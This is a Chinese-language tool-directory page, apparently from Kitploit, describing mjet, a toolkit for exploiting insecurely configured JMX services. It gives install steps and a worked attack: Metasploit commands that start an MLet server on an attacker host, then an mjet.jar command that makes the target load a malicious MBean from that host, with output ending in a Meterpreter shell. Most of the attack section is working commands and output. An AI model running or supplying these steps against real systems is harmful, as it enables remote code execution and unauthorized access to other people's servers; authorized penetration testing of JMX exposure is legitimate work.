Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
mjet — Mogwai Java 管理扩展 (JMX) 利用工具包 | Kitploit
工具/GitHubGitHub/mogwaisec/mjet
漏洞利用框架Payload生成漏洞利用渗透测试错误配置红队
GitHubmogwaisec/mjet

mjet

Mogwai Java 管理扩展 (JMX) 利用工具包

查看仓库
17431510年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

mjet

Mogwai Security Java 管理扩展(JMX)漏洞利用工具包

mjet 是一个可用于保护配置不安全的 JMX 服务的工具。它基于 Braden Thomas/Accuvant 的博文“Exploiting JMX-RMI”(http://www.accuvant.com/blog/exploiting-jmx-rmi),可用于在目标系统上执行任意的 Metasploit 载荷。

mjet 最初计划成为一个完整的攻击工具包,但我们注意到 Metasploit 的 Github 仓库中有一个拉取请求,该请求将以原生 Ruby 提供基本的 Java RMI/序列化支持。这太棒了,并且消除了对 Java 的依赖。因此我们停止开发此工具,并在不久的将来创建 Metasploit 模块。

mjet 包含以下部分:

  • 一个模拟“mlet Server”的 Metasploit 模块。它基本上是一个 Web 服务器,托管着一个包含 mlet 标签的 html 文件
  • 一个由 mlet server 模块修改以包含所选载荷的 ManagedBean
  • 一个用于联系不安全 JMX 服务的 jar 归档文件

安装(使用 Metasploit 的 github 版本)

  • 将 "MBean" 文件夹复制到 "data/java/metasploit"
  • 将 java_mlet_server.rb 复制到 "modules/exploits/multi/misc/"

使用方法

该示例使用以下系统: attacker: 192.168.178.1 target: 192.168.178.200,JMX 服务运行在 tcp 端口 1616 上

  • 配置/启动 metasploit 模块 "java_mlet_server"。该模块将作为后台任务运行
root@kitploit:~
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run

使用 mjet.jar 连接存在漏洞的 JMX 服务,并提供 MLet Web 服务器的 URL...

root@kitploit:~
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------

[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164  5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done

然后享受你的 meterpreter shell :-)

下载工具